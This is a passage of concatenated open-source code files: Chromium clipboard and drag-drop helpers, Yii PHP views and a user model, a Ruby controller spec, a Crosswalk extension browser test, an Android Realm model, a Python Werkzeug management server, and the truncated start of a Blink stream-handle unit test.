  base::RefCountedThreadSafe<DownloadFileObserver>::Release();
  return 0;
}
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, private:
// Copies |bytes| bytes from |data| into a new fixed GlobalAlloc block and
// wraps the handle in a TYMED_HGLOBAL STGMEDIUM owned by the caller.
static STGMEDIUM* GetStorageForBytes(const char* data, size_t bytes) {
  HANDLE handle = GlobalAlloc(GPTR, static_cast<int>(bytes));
  if (handle) {
    base::win::ScopedHGlobal<char> scoped(handle);
    // Copy exactly |bytes| bytes. The previous code copied
    // GlobalSize(handle) bytes, which may exceed |bytes| because GlobalAlloc
    // can round the allocation up, reading past the end of |data|.
    memcpy(scoped.get(), data, bytes);
  }
  STGMEDIUM* storage = new STGMEDIUM;
  storage->hGlobal = handle;
  storage->tymed = TYMED_HGLOBAL;
  storage->pUnkForRelease = NULL;
  return storage;
}
// Copies |payload| (including its NUL terminator) into a new GlobalAlloc
// block and returns the handle, or NULL on allocation failure.
template<class T>
static HGLOBAL CopyStringToGlobalHandle(const T& payload) {
  const size_t bytes =
      (payload.size() + 1) * sizeof(typename T::value_type);
  HANDLE handle = GlobalAlloc(GPTR, static_cast<int>(bytes));
  if (!handle)
    return NULL;
  void* data = GlobalLock(handle);
  // c_str() is NUL-terminated, so copying |bytes| bytes copies the
  // terminator as well. The previous code copied GlobalSize(handle) bytes,
  // which may exceed the string's storage (GlobalAlloc can round the
  // allocation up) and read out of bounds.
  memcpy(data, payload.c_str(), bytes);
  GlobalUnlock(handle);
  return handle;
}
// Wraps a UTF-16 string copy in a caller-owned TYMED_HGLOBAL STGMEDIUM.
static STGMEDIUM* GetStorageForString16(const string16& data) {
  STGMEDIUM* storage = new STGMEDIUM;
  storage->hGlobal = CopyStringToGlobalHandle<string16>(data);
  storage->tymed = TYMED_HGLOBAL;
  storage->pUnkForRelease = NULL;
  return storage;
}
// Wraps a narrow-string copy in a caller-owned TYMED_HGLOBAL STGMEDIUM.
static STGMEDIUM* GetStorageForString(const std::string& data) {
  STGMEDIUM* storage = new STGMEDIUM;
  storage->hGlobal = CopyStringToGlobalHandle<std::string>(data);
  storage->tymed = TYMED_HGLOBAL;
  storage->pUnkForRelease = NULL;
  return storage;
}
static void GetInternetShortcutFileContents(const GURL& url,
std::string* data) {
DCHECK(data);
static const std::string kInternetShortcutFileStart =
"[InternetShortcut]\r\nURL=";
static const std::string kInternetShortcutFileEnd =
"\r\n";
*data = kInternetShortcutFileStart + url.spec() + kInternetShortcutFileEnd;
}
// Produces a legal ".url" file name for a dragged link: uses |title| when
// available (with illegal path characters replaced), otherwise derives a
// name from |url|, falling back to a localized default. The result is
// truncated so that name plus extension fit within MAX_PATH.
static void CreateValidFileNameFromTitle(const GURL& url,
                                         const string16& title,
                                         string16* validated) {
  if (title.empty()) {
    if (url.is_valid()) {
      *validated = net::GetSuggestedFilename(url, "", "", "", "",
                                             std::string());
    } else {
      // Nothing else can be done, just use a default.
      *validated =
          l10n_util::GetStringUTF16(IDS_APP_UNTITLED_SHORTCUT_FILE_NAME);
    }
  } else {
    *validated = title;
    file_util::ReplaceIllegalCharactersInPath(validated, '-');
  }
  static const wchar_t extension[] = L".url";
  static const size_t max_length = MAX_PATH - arraysize(extension);
  if (validated->size() > max_length)
    validated->erase(max_length);
  *validated += extension;
}
// Builds a CF_HDROP-style STGMEDIUM: a DROPFILES header followed by a
// double-NUL-terminated wide-string list containing the single |path|.
static STGMEDIUM* GetStorageForFileName(const FilePath& path) {
  const size_t kDropSize = sizeof(DROPFILES);
  // Two extra wchar_t: the string's own terminator plus the list terminator.
  const size_t kTotalBytes =
      kDropSize + (path.value().length() + 2) * sizeof(wchar_t);
  HANDLE hdata = GlobalAlloc(GMEM_MOVEABLE, kTotalBytes);
  base::win::ScopedHGlobal<DROPFILES> locked_mem(hdata);
  DROPFILES* drop_files = locked_mem.get();
  drop_files->pFiles = sizeof(DROPFILES);
  drop_files->fWide = TRUE;
  wchar_t* data = reinterpret_cast<wchar_t*>(
      reinterpret_cast<BYTE*>(drop_files) + kDropSize);
  const size_t copy_size = (path.value().length() + 1) * sizeof(wchar_t);
  memcpy(data, path.value().c_str(), copy_size);
  data[path.value().length() + 1] = L'\0';  // Double NULL
  STGMEDIUM* storage = new STGMEDIUM;
  storage->tymed = TYMED_HGLOBAL;
  storage->hGlobal = hdata;
  storage->pUnkForRelease = NULL;
  return storage;
}
// Builds a FILEGROUPDESCRIPTOR describing a single link-UI file named after
// |path|; used together with file-contents transfers.
static STGMEDIUM* GetStorageForFileDescriptor(
    const FilePath& path) {
  string16 file_name = path.value();
  DCHECK(!file_name.empty());
  HANDLE hdata = GlobalAlloc(GPTR, sizeof(FILEGROUPDESCRIPTOR));
  base::win::ScopedHGlobal<FILEGROUPDESCRIPTOR> locked_mem(hdata);
  FILEGROUPDESCRIPTOR* descriptor = locked_mem.get();
  descriptor->cItems = 1;
  descriptor->fgd[0].dwFlags = FD_LINKUI;
  // Truncate to MAX_PATH - 1 so the fixed-size buffer stays NUL-terminated.
  wcsncpy_s(descriptor->fgd[0].cFileName, MAX_PATH, file_name.c_str(),
            std::min(file_name.size(), static_cast<size_t>(MAX_PATH - 1u)));
  STGMEDIUM* storage = new STGMEDIUM;
  storage->tymed = TYMED_HGLOBAL;
  storage->hGlobal = hdata;
  storage->pUnkForRelease = NULL;
  return storage;
}
///////////////////////////////////////////////////////////////////////////////
// OSExchangeData, public:
// static
// Factory hook: on Windows the platform provider is OSExchangeDataProviderWin.
OSExchangeData::Provider* OSExchangeData::CreateProvider() {
  return new OSExchangeDataProviderWin();
}
// static
// Registers (or looks up) a native clipboard format for the MIME-like |type|.
OSExchangeData::CustomFormat OSExchangeData::RegisterCustomFormat(
    const std::string& type) {
  return RegisterClipboardFormat(ASCIIToUTF16(type).c_str());
}
} // namespace ui
| nacl-webkit/chrome_deps | ui/base/dragdrop/os_exchange_data_provider_win.cc | C++ | bsd-3-clause | 33,704 |
<?php
use yii\helpers\Html;
use yii\widgets\ActiveForm;
/* @var $this yii\web\View */
/* @var $model app\models\SentitemsSearch */
/* @var $form yii\widgets\ActiveForm */
/* Search-form partial for sent SMS items. Submits its fields via GET to the
 * "index" action, where the SentitemsSearch model applies them as filters.
 * The commented-out fields below are additional filters that can be enabled
 * as needed. */
?>
<div class="sentitems-search">
    <?php $form = ActiveForm::begin([
        'action' => ['index'],
        'method' => 'get',
    ]); ?>
    <?= $form->field($model, 'UpdatedInDB') ?>
    <?= $form->field($model, 'InsertIntoDB') ?>
    <?= $form->field($model, 'SendingDateTime') ?>
    <?= $form->field($model, 'DeliveryDateTime') ?>
    <?= $form->field($model, 'Text') ?>
    <?php // echo $form->field($model, 'DestinationNumber') ?>
    <?php // echo $form->field($model, 'Coding') ?>
    <?php // echo $form->field($model, 'UDH') ?>
    <?php // echo $form->field($model, 'SMSCNumber') ?>
    <?php // echo $form->field($model, 'Class') ?>
    <?php // echo $form->field($model, 'TextDecoded') ?>
    <?php // echo $form->field($model, 'ID') ?>
    <?php // echo $form->field($model, 'SenderID') ?>
    <?php // echo $form->field($model, 'SequencePosition') ?>
    <?php // echo $form->field($model, 'Status') ?>
    <?php // echo $form->field($model, 'StatusError') ?>
    <?php // echo $form->field($model, 'TPMR') ?>
    <?php // echo $form->field($model, 'RelativeValidity') ?>
    <?php // echo $form->field($model, 'CreatorID') ?>
    <div class="form-group">
        <?= Html::submitButton('Search', ['class' => 'btn btn-primary']) ?>
        <?= Html::resetButton('Reset', ['class' => 'btn btn-default']) ?>
    </div>
    <?php ActiveForm::end(); ?>
</div>
| nmfzone/yiisms | views/sentitems/_search.php | PHP | bsd-3-clause | 1,573 |
<?php
namespace app\modules\usuarios\models;
use Yii;
use kartik\password\StrengthValidator;
/**
* This is the model class for table "usuarios".
*
* @property integer $id_usuario
* @property integer $fl_perfil
* @property integer $fl_persona
* @property string $username
* @property string $clave
* @property string $ultimo_login
* @property integer $status
*
* @property Recursos[] $recursos
* @property Reportes[] $reportes
* @property Perfiles $flPerfil
* @property Personas $flPersona
*/
class Usuarios extends \yii\db\ActiveRecord implements \yii\web\IdentityInterface {

    // Display-only attributes populated from joined relations (not columns).
    public $nombre_perfil;
    public $nombre_persona;
    public $apellido_persona;
    // Virtual attribute holding the password confirmation on create/update.
    public $validate_clave;

    /**
     * @inheritdoc
     */
    public static function tableName() {
        return 'usuarios';
    }

    /**
     * @inheritdoc
     */
    public function rules() {
        return [
            [['fl_perfil', 'fl_persona', 'username', 'clave', 'status'], 'required'],
            [['fl_perfil', 'fl_persona', 'status'], 'integer'],
            [['ultimo_login'], 'safe'],
            [['clave'], 'string', 'max' => 200],
            [['clave'], StrengthValidator::className(), 'preset' => 'normal', 'userAttribute' => 'username', 'on' => 'create'],
            ['validate_clave', 'required', 'on' => 'create'],
            ['validate_clave', 'required', 'on' => 'update'],
            ['validate_clave', 'compare', 'compareAttribute' => 'clave', 'message' => "Passwords no coinciden"],
            [['fl_perfil'], 'exist', 'skipOnError' => true, 'targetClass' => Perfiles::className(), 'targetAttribute' => ['fl_perfil' => 'id_perfile']],
            [['fl_persona'], 'exist', 'skipOnError' => true, 'targetClass' => Personas::className(), 'targetAttribute' => ['fl_persona' => 'id_persona']],
            [['id_usuario'], 'unique'],
            [['username'], 'unique', 'message' => 'Alias ya ultilizado'],
            [['fl_persona'], 'unique', 'message' => 'Esta persona ya posee un usuario'],
        ];
    }

    /**
     * @inheritdoc
     */
    public function attributeLabels() {
        return [
            'id_usuario' => Yii::t('app', 'Id Usuario'),
            'fl_perfil' => Yii::t('app', 'Perfil'),
            'fl_persona' => Yii::t('app', 'Persona'),
            'username' => Yii::t('app', 'Alias'),
            'clave' => Yii::t('app', 'Password'),
            'ultimo_login' => Yii::t('app', 'Ultimo Login'),
            'status' => Yii::t('app', 'Status'),
            'validate_clave' => Yii::t('app', 'Re-Password'),
        ];
    }

    /**
     * @return \yii\db\ActiveQuery recursos owned by this user
     */
    public function getRecursos() {
        return $this->hasMany(Recursos::className(), ['fk_usuario' => 'id_usuario']);
    }

    /**
     * @return \yii\db\ActiveQuery reportes created by this user
     */
    public function getReportes() {
        return $this->hasMany(Reportes::className(), ['fk_usuario' => 'id_usuario']);
    }

    /**
     * @return \yii\db\ActiveQuery the user's profile (role)
     */
    public function getFlPerfil() {
        return $this->hasOne(Perfiles::className(), ['id_perfile' => 'fl_perfil']);
    }

    /**
     * @return \yii\db\ActiveQuery the person record backing this user
     */
    public function getFlPersona() {
        return $this->hasOne(Personas::className(), ['id_persona' => 'fl_persona']);
    }

    /**
     * @inheritdoc
     * @return UsuariosQuery the active query used by this AR class.
     */
    public static function find() {
        return new query\UsuariosQuery(get_called_class());
    }

    // Cookie-based "remember me" login is not supported by this identity.
    public function getAuthKey() {
        throw new \yii\base\NotSupportedException();
    }

    public function getId() {
        return $this->id_usuario;
    }

    public function validateAuthKey($authKey) {
        throw new \yii\base\NotSupportedException();
    }

    public static function findIdentity($id) {
        return self::findOne($id);
    }

    // Token-based API authentication is not supported by this identity.
    public static function findIdentityByAccessToken($token, $type = null) {
        throw new \yii\base\NotSupportedException();
    }

    /**
     * Finds a user by its login alias.
     * @param string $username
     * @return static|null
     */
    public static function findByLogin($username) {
        return self::findOne(['username' => $username]);
    }

    /**
     * Checks a plain-text password against the stored hash.
     *
     * SECURITY: passwords are stored as unsalted MD5 hashes, which is weak
     * for password storage; migrating to password_hash()/Yii's Security
     * component is strongly recommended. Until such a data migration is
     * possible, hash_equals() at least makes the comparison timing-safe
     * without changing the stored format.
     *
     * @param string $password plain-text password to verify
     * @return bool whether the password matches
     */
    public function validatePassword($password) {
        return hash_equals($this->clave, md5($password));
    }
}
| delgado161/extranet | modules/usuarios/models/Usuarios.php | PHP | bsd-3-clause | 4,242 |
require 'spec_helper'
describe QuestionController do
describe "GET answer" do
it "assigns quantities" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:quantities).map{|x| x.to_s}.should eql ['10.0 t', '1000.0 km']
end
it "assigns terms" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:terms).should eql ['shipping', 'stuff']
end
it "assigns categories" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:categories).should eql [ "Etching_and_CVD_cleaning_in_the_Electronics_Industry",
"DEFRA_freight_transport_methodology",
"Freight_transport_by_Greenhouse_Gas_Protocol" ]
end
it "assigns a thinking message" do
get :answer, :q => 'shipping 10 tonnes of stuff for 1000 kilometres'
assigns(:message).should_not be_blank
end
end
describe "GET detail" do
it "gets results with a single input quantity" do
get :detailed_answer, :quantities => '100.0 km', :terms => 'truck', :category => 'Generic_van_transport'
assigns(:amount).should_not be_nil
assigns(:amount)[:value].should eql 27.18
assigns(:more_info_url).should eql 'http://discover.amee.com/categories/Generic_van_transport/data/cng/up%20to%203.5%20tonnes/result/false/true/none/100.0;km/false/none/0/-1/0/true/false/false'
end
it "gets results with two input quantities" do
get :detailed_answer, :quantities => '100.0 km,1.0 t', :terms => 'truck', :category => 'DEFRA_freight_transport_methodology'
assigns(:amount).should_not be_nil
assigns(:amount)[:value].should eql 80.7365279
assigns(:more_info_url).should eql 'http://discover.amee.com/categories/DEFRA_freight_transport_methodology/data/van/petrol/1.305-1.74%20t/result/100.0;km/1.0;t'
end
it "gets results with IATA codes" do
get :detailed_answer, :quantities => 'from:LHR,to:LAX', :terms => 'fly', :category => 'Great_Circle_flight_methodology'
assigns(:amount).should_not be_nil
assigns(:amount)[:value].should be_within(1e-9).of(1064.49102031516)
assigns(:more_info_url).should eql 'http://discover.amee.com/categories/Great_Circle_flight_methodology/data/great%20circle%20route/result/LHR/LAX/false/1/-999/-999/-999/-999/none/average/1/1.9/false'
end
end
end | OpenAMEE/askamee | spec/controllers/question_controller_spec.rb | Ruby | bsd-3-clause | 2,459 |
// Copyright (c) 2013 Intel Corporation. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "xwalk/sysapps/common/common_api_browsertest.h"
#include "base/path_service.h"
#include "base/strings/utf_string_conversions.h"
#include "content/public/test/browser_test.h"
#include "content/public/test/browser_test_utils.h"
#include "content/public/test/test_utils.h"
#include "net/base/net_util.h"
#include "xwalk/extensions/browser/xwalk_extension_service.h"
#include "xwalk/extensions/common/xwalk_extension.h"
#include "xwalk/runtime/browser/runtime.h"
#include "xwalk/sysapps/common/binding_object.h"
#include "xwalk/test/base/in_process_browser_test.h"
#include "xwalk/test/base/xwalk_test_utils.h"
using namespace xwalk::extensions; // NOLINT
using xwalk::sysapps::BindingObject;
// Test extension exposing the "sysapps_common_test" JS API. The injected
// script builds a TestObject on top of the common BindingObject/EventTarget
// helpers and exports hooks used by the HTML side of the browser test.
// NOTE: the JS source below is runtime data and must not be reformatted.
SysAppsTestExtension::SysAppsTestExtension() {
  set_name("sysapps_common_test");
  set_javascript_api(
      "var v8tools = requireNative('v8tools');"
      ""
      "var internal = requireNative('internal');"
      "internal.setupInternalExtension(extension);"
      ""
      "var common = requireNative('sysapps_common');"
      "common.setupSysAppsCommon(internal, v8tools);"
      ""
      "var Promise = requireNative('sysapps_promise').Promise;"
      ""
      "var TestObject = function() {"
      "  common.BindingObject.call(this, common.getUniqueId());"
      "  common.EventTarget.call(this);"
      "  internal.postMessage('TestObjectConstructor', [this._id]);"
      "  this._addMethod('isTestEventActive', true);"
      "  this._addMethod('fireTestEvent', true);"
      "  this._addMethodWithPromise('makeFulfilledPromise', Promise);"
      "  this._addMethodWithPromise('makeRejectedPromise', Promise);"
      "  this._addEvent('test');"
      "  this._registerLifecycleTracker();"
      "};"
      ""
      "TestObject.prototype = new common.EventTargetPrototype();"
      ""
      "exports.v8tools = v8tools;"
      "exports.TestObject = TestObject;"
      "exports.hasObject = function(object_id, callback) {"
      "  internal.postMessage('hasObject', [object_id], callback);"
      "};");
}
// One extension instance is created per frame/context requesting the API.
XWalkExtensionInstance* SysAppsTestExtension::CreateInstance() {
  return new SysAppsTestExtensionInstance();
}
// Registers the message handlers the injected JS posts to: object
// construction and the hasObject introspection helper.
SysAppsTestExtensionInstance::SysAppsTestExtensionInstance()
    : handler_(this),
      store_(&handler_) {
  handler_.Register("TestObjectConstructor",
      base::Bind(&SysAppsTestExtensionInstance::OnSysAppsTestObjectContructor,
                 base::Unretained(this)));
  handler_.Register("hasObject",
      base::Bind(&SysAppsTestExtensionInstance::OnHasObject,
                 base::Unretained(this)));
}
// Routes every incoming message through the function handler.
void SysAppsTestExtensionInstance::HandleMessage(scoped_ptr<base::Value> msg) {
  handler_.HandleMessage(msg.Pass());
}
// Creates the native peer for a JS TestObject and files it under the id
// the script generated. (Name keeps the "Contructor" typo declared in the
// header.)
void SysAppsTestExtensionInstance::OnSysAppsTestObjectContructor(
    scoped_ptr<XWalkExtensionFunctionInfo> info) {
  std::string object_id;
  ASSERT_TRUE(info->arguments()->GetString(0, &object_id));
  scoped_ptr<BindingObject> obj(new SysAppsTestObject);
  store_.AddBindingObject(object_id, obj.Pass());
}
// Replies with a boolean telling whether |object_id| is still alive in the
// store; the test uses this to verify lifecycle tracking.
void SysAppsTestExtensionInstance::OnHasObject(
    scoped_ptr<XWalkExtensionFunctionInfo> info) {
  std::string object_id;
  ASSERT_TRUE(info->arguments()->GetString(0, &object_id));
  scoped_ptr<base::ListValue> result(new base::ListValue());
  result->AppendBoolean(store_.HasObjectForTesting(object_id));
  info->PostResult(result.Pass());
}
// Native peer of the JS TestObject: wires up the four methods exposed to
// script and tracks whether the 'test' event has listeners.
SysAppsTestObject::SysAppsTestObject() : is_test_event_active_(false) {
  handler_.Register("isTestEventActive",
      base::Bind(&SysAppsTestObject::OnIsTestEventActive,
                 base::Unretained(this)));
  handler_.Register("fireTestEvent",
      base::Bind(&SysAppsTestObject::OnFireTestEvent,
                 base::Unretained(this)));
  handler_.Register("makeFulfilledPromise",
      base::Bind(&SysAppsTestObject::OnMakeFulfilledPromise,
                 base::Unretained(this)));
  handler_.Register("makeRejectedPromise",
      base::Bind(&SysAppsTestObject::OnMakeRejectedPromise,
                 base::Unretained(this)));
}
// Called when the first listener for |type| is added on the JS side.
void SysAppsTestObject::StartEvent(const std::string& type) {
  if (type == "test")
    is_test_event_active_ = true;
}
// Called when the last listener for |type| is removed on the JS side.
void SysAppsTestObject::StopEvent(const std::string& type) {
  if (type == "test")
    is_test_event_active_ = false;
}
void SysAppsTestObject::OnIsTestEventActive(
    scoped_ptr<XWalkExtensionFunctionInfo> info) {
  scoped_ptr<base::ListValue> result(new base::ListValue());
  result->AppendBoolean(is_test_event_active_);
  info->PostResult(result.Pass());
}
// Dispatches a 'test' event carrying a fixed payload, then acknowledges the
// call with an empty result.
void SysAppsTestObject::OnFireTestEvent(
    scoped_ptr<XWalkExtensionFunctionInfo> info) {
  scoped_ptr<base::ListValue> data(new base::ListValue());
  data->AppendString("Lorem ipsum");
  DispatchEvent("test", data.Pass());
  scoped_ptr<base::ListValue> result(new base::ListValue());
  info->PostResult(result.Pass());
}
// Promise results are [data, error]; an empty error string means success.
void SysAppsTestObject::OnMakeFulfilledPromise(
    scoped_ptr<XWalkExtensionFunctionInfo> info) {
  scoped_ptr<base::ListValue> result(new base::ListValue());
  result->AppendString("Lorem ipsum");  // Data.
  result->AppendString("");  // Error, empty == no error.
  info->PostResult(result.Pass());
}
void SysAppsTestObject::OnMakeRejectedPromise(
    scoped_ptr<XWalkExtensionFunctionInfo> info) {
  scoped_ptr<base::ListValue> result(new base::ListValue());
  result->AppendString("");  // Data.
  result->AppendString("Lorem ipsum");  // Error, !empty == error.
  info->PostResult(result.Pass());
}
// Browser-test fixture that installs SysAppsTestExtension before the
// in-process browser starts.
class SysAppsCommonTest : public InProcessBrowserTest {
 public:
  virtual void SetUp() {
    XWalkExtensionService::SetCreateUIThreadExtensionsCallbackForTesting(
        base::Bind(&SysAppsCommonTest::CreateExtensions,
                   base::Unretained(this)));
    InProcessBrowserTest::SetUp();
  }

  void CreateExtensions(XWalkExtensionVector* extensions) {
    extensions->push_back(new SysAppsTestExtension);
  }
};
// Loads the HTML harness and waits for it to set the document title to
// "Pass" or "Fail"; the JS side exercises the common binding-object API.
IN_PROC_BROWSER_TEST_F(SysAppsCommonTest, SysAppsCommon) {
  const base::string16 passString = base::ASCIIToUTF16("Pass");
  const base::string16 failString = base::ASCIIToUTF16("Fail");
  content::RunAllPendingInMessageLoop();
  content::TitleWatcher title_watcher(runtime()->web_contents(), passString);
  title_watcher.AlsoWaitForTitle(failString);
  base::FilePath test_file;
  PathService::Get(base::DIR_SOURCE_ROOT, &test_file);
  test_file = test_file
      .Append(FILE_PATH_LITERAL("xwalk"))
      .Append(FILE_PATH_LITERAL("sysapps"))
      .Append(FILE_PATH_LITERAL("common"))
      .Append(FILE_PATH_LITERAL("common_api_browsertest.html"));
  xwalk_test_utils::NavigateToURL(runtime(), net::FilePathToFileURL(test_file));
  EXPECT_EQ(passString, title_watcher.WaitAndGetTitle());
}
| shaochangbin/crosswalk | sysapps/common/common_api_browsertest.cc | C++ | bsd-3-clause | 6,721 |
package org.grassroot.android.models.responses;
import org.grassroot.android.models.Group;
import org.grassroot.android.models.helpers.RealmString;
import io.realm.RealmList;
import io.realm.RealmObject;
/**
* Created by luke on 2016/07/13.
*/
/**
 * Realm-backed response payload describing a set of group changes: the
 * groups that were added or updated, and the uids of groups that were
 * removed. Field names are preserved for Realm's reflective mapping.
 */
public class GroupsChangedResponse extends RealmObject {

    private RealmList<Group> addedAndUpdated = new RealmList<>();
    private RealmList<RealmString> removedUids = new RealmList<>();

    public GroupsChangedResponse() {
        // Public no-arg constructor required by Realm.
    }

    public RealmList<Group> getAddedAndUpdated() {
        return addedAndUpdated;
    }

    public void setAddedAndUpdated(RealmList<Group> addedAndUpdated) {
        this.addedAndUpdated = addedAndUpdated;
    }

    public RealmList<RealmString> getRemovedUids() {
        return removedUids;
    }

    public void setRemovedUids(RealmList<RealmString> removedUids) {
        this.removedUids = removedUids;
    }

    @Override
    public String toString() {
        // Produces exactly the same string as the previous concatenation.
        StringBuilder builder = new StringBuilder("GroupsChangedResponse{");
        builder.append("addedAndUpdated=").append(addedAndUpdated);
        builder.append(", removedUids=").append(removedUids);
        builder.append('}');
        return builder.toString();
    }
}
| grassrootza/grassroot-android | app/src/main/java/org/grassroot/android/models/responses/GroupsChangedResponse.java | Java | bsd-3-clause | 1,127 |
<?php
use yii\helpers\Html;
use yii\widgets\ActiveForm;
/* @var $this yii\web\View */
/* @var $model app\models\Facultycourse */
/* @var $form yii\widgets\ActiveForm */
/* Form partial for assigning courses to a faculty member: renders a
 * multi-select built from $courses (value => label map supplied by the
 * controller) and a submit button. */
?>
<div class="facultycourse-form">
    <?php $form = ActiveForm::begin(); ?>
    <?= $form->field($model, 'courses')->dropDownList($courses, ['multiple' => true, 'size' => 30]) ?>
    <div class="form-group">
        <?= Html::submitButton(Yii::t('app', 'Save'), ['class' => 'btn btn-success']) ?>
    </div>
    <?php ActiveForm::end(); ?>
</div>
| tbcabagay/ficdatabase | modules/main/views/facultycourse/_form.php | PHP | bsd-3-clause | 526 |
__author__ = 'Bohdan Mushkevych'
from threading import Thread
from werkzeug.wrappers import Request
from werkzeug.wsgi import ClosingIterator
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.exceptions import HTTPException, NotFound
from werkzeug.serving import run_simple
from synergy.conf import settings
from synergy.system.system_logger import get_logger
from synergy.scheduler.scheduler_constants import PROCESS_MX
from synergy.mx.utils import STATIC_PATH, local, local_manager, url_map, jinja_env
from synergy.mx import views
from flow.mx import views as flow_views
from flow.mx import STATIC_FLOW_ENDPOINT, STATIC_FLOW_PATH
import socket
socket.setdefaulttimeout(10.0) # set default socket timeout at 10 seconds
class MX(object):
    """ MX stands for Management Extension and represents HTTP server serving UI front-end for Synergy Scheduler """

    def __init__(self, mbean):
        """
        :param mbean: management bean (typically the Scheduler instance),
            exposed to all Jinja templates via the *mbean* global
        """
        local.application = self

        self.mx_thread = None
        self.mbean = mbean
        jinja_env.globals['mbean'] = mbean

        # wrap the WSGI dispatcher so static assets are served directly;
        # this intentionally shadows the *dispatch* method with an instance attribute
        self.dispatch = SharedDataMiddleware(self.dispatch, {
            f'/scheduler/static': STATIC_PATH,
            f'/{STATIC_FLOW_ENDPOINT}': STATIC_FLOW_PATH,
        })

        # during the get_logger call a 'werkzeug' logger will be created
        # later, werkzeug._internal.py -> _log() will assign the logger to global _logger variable
        self.logger = get_logger(PROCESS_MX)

    def dispatch(self, environ, start_response):
        """ WSGI entry point: matches the request URL to an endpoint and invokes
            the view handler, looking first in synergy.mx.views and falling back
            to flow.mx.views
        :param environ: WSGI environ dict
        :param start_response: WSGI response-starting callable
        :return: iterable over the response body """
        local.application = self
        request = Request(environ)
        local.url_adapter = adapter = url_map.bind_to_environ(environ)
        local.request = request
        try:
            endpoint, values = adapter.match()

            # first - try to read from synergy.mx.views
            handler = getattr(views, endpoint, None)
            if not handler:
                # otherwise - read from flow.mx.views
                handler = getattr(flow_views, endpoint)
            response = handler(request, **values)
        except NotFound:
            response = views.not_found(request)
            response.status_code = 404
        except HTTPException as e:
            response = e
        return ClosingIterator(response(environ, start_response),
                               [local_manager.cleanup])

    def __call__(self, environ, start_response):
        return self.dispatch(environ, start_response)

    def start(self, hostname=None, port=None):
        """ Spawns a new HTTP server, residing on defined hostname and port
        :param hostname: the default hostname the server should listen on.
        :param port: the default port of the server.
        """
        if hostname is None:
            hostname = settings.settings['mx_host']
        if port is None:
            port = settings.settings['mx_port']

        reloader = False        # use_reloader: the default setting for the reloader.
        debugger = False        #
        evalex = True           # should the exception evaluation feature be enabled?
        threaded = False        # True if each request is handled in a separate thread
        processes = 1           # if greater than 1 then handle each request in a new process
        reloader_interval = 1   # the interval for the reloader in seconds.
        static_files = None     # static_files: optional dict of static files.
        extra_files = None      # extra_files: optional list of extra files to track for reloading.
        ssl_context = None      # ssl_context: optional SSL context for running server in HTTPS mode.

        # BUG FIX: pass *run_simple* itself as the thread target so the blocking
        # server loop runs inside the spawned thread; previously run_simple(...)
        # was invoked eagerly in the calling thread (blocking it) and its None
        # return value was handed to Thread as the target
        self.mx_thread = Thread(target=run_simple,
                                kwargs=dict(hostname=hostname,
                                            port=port,
                                            application=self,
                                            use_debugger=debugger,
                                            use_evalex=evalex,
                                            extra_files=extra_files,
                                            use_reloader=reloader,
                                            reloader_interval=reloader_interval,
                                            threaded=threaded,
                                            processes=processes,
                                            static_files=static_files,
                                            ssl_context=ssl_context))
        self.mx_thread.daemon = True
        self.mx_thread.start()

    def stop(self):
        """ method stops currently running HTTP server, if any
            NOTE: must be invoked while a request is being served, since Werkzeug
            exposes the shutdown hook only through the active request's environ
            :see: `werkzeug.serving.make_environ`
            http://flask.pocoo.org/snippets/67/ """
        # BUG FIX: the shutdown callable lives in the WSGI environ of the current
        # request, not in the Jinja environment (jinja_env has no *get* method,
        # so the previous code raised AttributeError before ever shutting down)
        func = local.request.environ.get('werkzeug.server.shutdown')
        if func is None:
            raise RuntimeError('MX Error: no Shutdown Function registered for the Werkzeug Server')
        func()
if __name__ == '__main__':
    # ad-hoc smoke run: start the MX web server wired to a standalone Scheduler
    from synergy.scheduler.scheduler_constants import PROCESS_SCHEDULER
    from synergy.scheduler.synergy_scheduler import Scheduler

    scheduler = Scheduler(PROCESS_SCHEDULER)
    app = MX(scheduler)
    app.start()
| mushkevych/scheduler | synergy/mx/synergy_mx.py | Python | bsd-3-clause | 5,162 |
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "modules/fetch/ReadableStreamDataConsumerHandle.h"
#include "bindings/core/v8/ReadableStreamOperations.h"
#include "bindings/core/v8/ScriptState.h"
#include "bindings/core/v8/V8BindingMacros.h"
#include "bindings/core/v8/V8GCController.h"
#include "bindings/core/v8/V8RecursionScope.h"
#include "core/dom/Document.h"
#include "core/testing/DummyPageHolder.h"
#include "modules/fetch/DataConsumerHandleTestUtil.h"
#include "platform/heap/Handle.h"
#include "platform/testing/UnitTestHelpers.h"
#include "public/platform/WebDataConsumerHandle.h"
#include "testing/gmock/include/gmock/gmock.h"
#include "testing/gtest/include/gtest/gtest.h"
#include <v8.h>
// TODO(yhirano): Add cross-thread tests once the handle gets thread-safe.
namespace blink {
namespace {
using ::testing::InSequence;
using ::testing::StrictMock;
using Checkpoint = StrictMock<::testing::MockFunction<void(int)>>;
using Result = WebDataConsumerHandle::Result;
const Result kOk = WebDataConsumerHandle::Ok;
const Result kShouldWait = WebDataConsumerHandle::ShouldWait;
const Result kUnexpectedError = WebDataConsumerHandle::UnexpectedError;
const Result kDone = WebDataConsumerHandle::Done;
using Flags = WebDataConsumerHandle::Flags;
const Flags kNone = WebDataConsumerHandle::FlagNone;
// Strict gmock client: the test fails on any didGetReadable() notification
// that was not explicitly EXPECT_CALL'ed.
class MockClient : public GarbageCollectedFinalized<MockClient>, public WebDataConsumerHandle::Client {
public:
    static StrictMock<MockClient>* create() { return new StrictMock<MockClient>(); }
    MOCK_METHOD0(didGetReadable, void());

    DEFINE_INLINE_TRACE() {}

protected:
    MockClient() = default;
};
// Test fixture: hosts a DummyPageHolder so that script can be evaluated in the
// page's main world, and provides helpers to build a consumer handle from a
// ReadableStream created in script.
class ReadableStreamDataConsumerHandleTest : public ::testing::Test {
public:
    ReadableStreamDataConsumerHandleTest()
        : m_page(DummyPageHolder::create())
    {
    }

    ScriptState* getScriptState() { return ScriptState::forMainWorld(m_page->document().frame()); }
    v8::Isolate* isolate() { return getScriptState()->isolate(); }

    // Compiles and runs |s| in the main-world context; microtasks are
    // suppressed while the script executes. Returns an empty MaybeLocal (and
